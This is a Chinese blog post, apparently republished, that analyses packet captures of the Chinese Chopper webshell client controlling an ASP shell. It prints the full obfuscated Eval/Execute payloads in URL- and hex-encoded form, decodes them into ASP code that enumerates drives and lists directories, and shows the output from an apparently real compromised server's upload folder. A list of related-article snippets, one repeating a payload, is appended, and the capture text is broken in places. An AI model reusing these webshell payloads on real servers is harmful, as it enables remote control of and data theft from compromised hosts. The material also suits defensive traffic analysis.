菜刀 ASP链接SHELL 抓包结果及分析

http://blog.csdn.net/webxscan     神龙

&chr(9)      TAB  \t

&chr(58)     :

:       换行

WebRoot   获取  SHELL信息

#获取路径

x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20533A533D5365727665722E4D61707061746828222E2229266368722839293A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A4966204572722054

68656E3A4572722E436C6561723A456C73653A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E57726974652

85329"""")):Response.Write(""""|<-""""):Response.End"")")

Dim S:S=Server.Mappath(".")&chr(9)

SET C=CreateObject("Scripting.FileSystemObject")

If Err Then

Err.Clear

Else

For Each D in C.Drives

S=S&D.DriveLetter&chr(58)

Next

End If

Response.Write(S)

->|d:\virtualhost\host7377245\www\upload\newsimage\shell.asp    C:D:E:R:|<-

##################################

FileManage   通过目录获取文件列表信息

获取目录

x=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""

44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D20464426223

0223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D617444

61746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A5345542

0433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E7365

2E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E5772697465204

62E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E6174747269627574

657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F64696669656429266368722

83929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966

"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=643A5C5C7669727475616C686F73745C5C686F7374373337373234355C5C7777775C5C75706C6F61645C5C6E657773696D6167655C5C7368656C6C2E6173705C5C

Dim RR:RR=bd(Request("z1"))

Function FD(dt)

FD=Year(dt)&"-"

If Len(Month(dt))=1 Then

FD = FD&"0"

End If

FD=FD&Month(dt)&"-"

If Len(Day(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"

If Len(Second(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Second(dt)

End Function

SET C=CreateObject("Scripting.FileSystemObject")

Set FO=C.GetFolder(""&RR&"")

If Err Then

Response.Write("ERROR:// "&Err.Description)

Err.Clear

Else

For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)

Next

For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)

Next

End If

Dim RR:RR=bd(Request("z1"))Function FD(dt)FD=Year(dt)&"-"If Len(Month(dt))=1 ThenFD = FD&&chr(48)End IfFD=FD&Month(dt)&"-"If Len(Day(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"If Len(Second(dt))=1 ThenFD=FD&&chr(48)End IfFD=FD&Second(dt)End
FunctionSET C=CreateObject("Scripting.FileSystemObject")Set FO=C.GetFolder(""&RR&"")If Err ThenResponse.Write("ERROR: "&Err.Description)Err.ClearElseFor Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)NextFor
Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)NextEnd If

->|z/    2016-01-06 14:02:59    0    16

20151125161429379.jpg    2015-11-25 16:14:29    27    1

20151125161501308.jpg    2015-11-25 16:15:01    27    1

20151126152910502.jpg    2015-11-26

15:29:10    27    1

20151127140949237.jpg    2015-11-27 14:09:49    27    1

20151127141016802.jpg    2015-11-27 14:10:16    27    1

20151128121918619.jpg    2015-11-28 12:19:18    27

1

20151128122050259.jpg    2015-11-28 12:20:50    27    1

20151129134832033.jpg    2015-11-29 13:48:33    27    1

20151129134914657.jpg    2015-11-29 13:49:14    27    1

20151130131448878.jpg    2015-11-30 13:14:48    27    1

20151130131502483.jpg    2015-11-30 13:15:02    27    1

20151201201439010.jpg    2015-12-01 20:14:39    27    1

20151201201635647.jpg    2015-12-01 20:16:35    27    1

20151202155709826.jpg    2015-12-02 15:57:09    27    1

20151202155810417.jpg    2015-12-02 15:58:10    27    1

20151203161010273.jpg    2015-12-03 16:10:10    27    1

20151203161106179.jpg    2015-12-03 16:11:06    27

Receive: Return Code: 0x00000000

1

20151204143314886.jpg    2015-12-04 14:33:14    27    1

20151206134439872.jpg    2015-12-06 13:44:39    27    1

20151206134534952.jpg    2015-12-06 13:45:34    27    1

20151207122215148.jpg    2015-12-07 12:22:15    27    1

201512

Receive: Return Code: 0x00000000

07122330608.jpg    2015-12-07 12:23:30    27    1

20151208130657123.jpg    2015-12-08 13:06:57    27    1

20151208130759351.jpg    2015-12-08 13:07:59    27    1

20151209143924394.jpg    2015

-12-09 14:39:24    27    1

20151209144048891.jpg    2015-12-09 14:40:48    27    1

20151210140328146.jpg    2015-12-10 14:03:28    27    1

20151210140553956.jpg    2015-12-10 14:05:53    27

1

20151211131426653.jpg    2015-12-11 13:14:26    27    1

20151212141046434.jpg    2015-12-12 14:10:46    27    1

20151212141301143.jpg    2015-12-12 14:13:01    27    1

20151213125012208.jpg    2015-12-13 12:50:12    27    1

2

时间: 2024-10-10 03:04:27

菜刀 ASP链接SHELL 抓包结果及分析的相关文章

菜刀ASP 下载文件抓包

http://blog.csdn.net/webxscan     神龙 打开文件 Send: Return Code: 0x00000000 webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%

Centos6.5下使用tcpdump抓包并用wireshark分析

前言 原创文章欢迎转载,请保留出处. 若有任何疑问建议,欢迎回复. 邮箱:[email protected] 在Centos6.5下通过使用tcpdump抓包和wireshark分析包,初步了解抓包和解包 安装 首先我们要安装tcpdump,必须的库: yum install flex yum install bison yum install gcc 另外tcpdump是基于libpcap,这个在yum找不到,我们到tcpdump的官网(http://www.tcpdump.org/#late

tcpdump 抓包 通过 Wireshark分析抓包文件

1. tcpdump的基本原理 1.1  tcpdump starce 的区别 在本机中的进程的系统行为调用跟踪,starce   是一个很好的工具:但是在网络问题的调试中,tcpdump 应该是一个必不可少的工具:能清晰分析网络通信的信息. 默认情况下,tcpdump 不会抓取本机内部通讯的报文   :根据网络协议栈的规定,对于报文,即使是目的地是本机(自己和自己通信),也需要经过本机的网络协议层,所以本机通讯肯定是通过API进入内核,并且完成路由选择.[比如本机的TCP通信,也必须要sock

网络抓包,协议分析,流量统计程序

// YQPackageCaptureDlg.cpp : 实现文件 // #include "stdafx.h" #include "YQPackageCapture.h" #include "YQPackageCaptureDlg.h" #include "afxdialogex.h" #include <pcap.h> #include <vector> #include <afxwin.h&

Wireshark抓包之详细分析

数据链路层以太网帧头部信息 Destination 目标mac Source 此数据包的源mac 物理层,为设备之间的数据通信提供传输媒体及互连设备,总结来说就是"信号和介质" Frame 4: 66 bytes on wire (528 bits), 66 bytes captured (528 bits)   4号帧,线路66字节,实际捕获66字节 Encapsulation type: Ethernet (1)  封装类型 以太网1 Arrival Time: Feb Sep, 

tcpdump抓包脚本

由于最近服务器流量异常所以写了一个简单的shell抓包脚本,每间隔10分钟进行一次抓包分别保存在不同的文件当中,脚本如下: #!/bin/sh #This is tcpdump script one=1two=2while (( $one != $two ))dosleep 1TIME=`date +%F"-"%H:%M:%S`tcpdump -i eth0  -s 0 -w tcpdum.$TIME &sleep 600ps -ef|grep tcpdump|grep -v

Wireshark 网络抓包工具Wireshark的使用

阅读目录 wireshark介绍 wireshark不能做的 wireshark VS Fiddler 同类的其他工具 什么人会用到wireshark wireshark 开始抓包 wireshark 窗口介绍 wireshark 显示过滤 保存过滤 过滤表达式 封包列表(Packet List Pane) 封包详细信息 (Packet Details Pane) wireshark与对应的OSI七层模型 TCP包的具体内容 实例分析TCP三次握手过程 wireshark介绍 wireshark

网络抓包wireshark

抓包应该是每个技术人员掌握的基础知识,无论是技术支持运维人员或者是研发,多少都会遇到要抓包的情况,用过的抓包工具有fiddle.wireshark,作为一个不是经常要抓包的人员,学会用Wireshark就够了,毕竟它是功能最全面使用者最多的抓包工具. Wireshark(前称Ethereal)是一个网络封包分析软件.网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料.Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换. 网络封包分析软件的功能可想像成

网络抓包wireshark(转)

转自 网络抓包wireshark 抓包应该是每个技术人员掌握的基础知识,无论是技术支持运维人员或者是研发,多少都会遇到要抓包的情况,用过的抓包工具有fiddle.wireshark,作为一个不是经常要抓包的人员,学会用Wireshark就够了,毕竟它是功能最全面使用者最多的抓包工具. Wireshark(前称Ethereal)是一个网络封包分析软件.网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料.Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换